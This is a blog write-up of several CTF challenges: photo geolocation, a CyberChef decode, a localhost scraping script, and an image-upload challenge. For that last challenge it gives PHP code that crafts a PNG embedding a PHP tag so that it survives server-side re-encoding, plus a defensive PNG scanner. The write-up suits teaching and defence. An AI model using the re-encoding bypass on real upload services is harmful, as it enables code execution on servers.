CAUC ATCTF WP


I miss you so much in xx

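Reverse image search on Baidu and Google did not identify the photo, but Xiaohongshu recognized it as Shantou. Narrowing the search further showed it is Nan'ao, Shantou, Guangdong Province.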

Cracked at a glance

CyberChef decodes it directly.


image?

Reference: Secondary rendering bypass (二次渲染绕过) · GitBook

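Following the hint, the goal is to bypass the server's secondary rendering (re-encoding) of the uploaded image.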

<?php 
$a='cX<?PHP PHPINFO();?>X'.urldecode('%00').urldecode('%00');

$payload_ascii='';
for($i=0;$i<strlen($a);$i++){
    $payload_ascii.=bin2hex($a[$i]);
}

$payload_hex=bin2hex(gzinflate(hex2bin($payload_ascii)));

// echo $payload_hex."\n";
preg_match_all('/[a-z0-9]{2}/', $payload_hex, $matches);

$blist=[];

foreach($matches[0] as $key => $value){
    $blist[$key]=base_convert($value, 16, 10);
}

function filter1($blist){
    for($i=0; $i<(count($blist)-3);$i++){
        $blist[$i+3] = ($blist[$i+3] + $blist[$i]) %256;
    }
    return array_values($blist);
}

function filter3($blist){
    for($i=0; $i<(count($blist)-3);$i++){
        $blist[$i+3] = ($blist[$i+3] + floor($blist[$i]/2) ) %256;
    }
    return array_values($blist);
}
$p=array_merge(filter1($blist), filter3($blist));
$img = imagecreatetruecolor(32, 32);

// echo sizeof($p);
for ($y = 0; $y < sizeof($p)-3; $y += 3) {
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);
   // echo $color;
   imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img,'./1.png');

Upload the crafted PNG image.


The flag is in the phpinfo output.
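A defensive counterpart to the technique above, as an added example that is not part of the original post: because the tag is placed so that it survives re-encoding, an upload filter has to scan the bytes that are finally stored, chunk by chunk and case-insensitively. The function names and the test images built at level 0 compression are assumptions of this example.

```python
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Case-insensitive on purpose: the payload on this page uses an upper-case tag.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)

def png_chunks(data):
    """Yield (type, body) per chunk; reject bad signature, length or CRC."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos < len(data):
        if pos + 12 > len(data):
            raise ValueError("truncated chunk")
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc = data[pos + 8 + length:pos + 12 + length]
        if len(crc) != 4 or struct.unpack(">I", crc)[0] != zlib.crc32(ctype + body):
            raise ValueError("corrupt chunk")
        yield ctype, body
        pos += 12 + length

def scan_png(data):
    """Return the chunk types whose stored bytes contain a PHP open tag."""
    hits, idat = [], b""
    for ctype, body in png_chunks(data):
        if ctype == b"IDAT":
            idat += body  # join first: a tag can straddle two IDAT chunks
        elif PHP_TAG.search(body):
            hits.append(ctype.decode("latin-1"))
    if PHP_TAG.search(idat):
        hits.append("IDAT")
    return hits

def _chunk(ctype, body):
    crc = zlib.crc32(ctype + body)
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

def make_png(row, split=None):
    """Constructed one-row RGB fixture; zlib level 0 stores the row verbatim."""
    ihdr = struct.pack(">IIBBBBB", len(row) // 3, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00" + row, 0)
    parts = [idat] if split is None else [idat[:split], idat[split:]]
    chunks = [_chunk(b"IDAT", p) for p in parts]
    return PNG_SIG + _chunk(b"IHDR", ihdr) + b"".join(chunks) + _chunk(b"IEND", b"")

MARKER = b"<?PHP /* test */ ?>".ljust(21)  # constructed, harmless marker
print(scan_png(make_png(MARKER)), scan_png(make_png(b"\x80" * 21)))
```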

sign in

From 秋名山车神

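Build a regular expression to extract the number of problems from the page, match it against the response, then submit that value (num) to get the correct alert.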

import re
import requests

url="http://127.0.0.1:59793"
s = requests.session()
r = s.get(url)
text = r.text
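# The page text contains "刷N道题" ("solve N problems"); capture N.
pattern = r"刷(\d+)道题"
match = re.search(pattern, text)
if match is None:
    raise SystemExit("question count not found in the response")
number_of_questions = match.group(1)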
data = {
    "num": number_of_questions
}
r_post = s.post(url, data=data)
print(f"返回的结果:\n{r_post.text}")


posted @ 2024-12-01 18:58  8o1er9t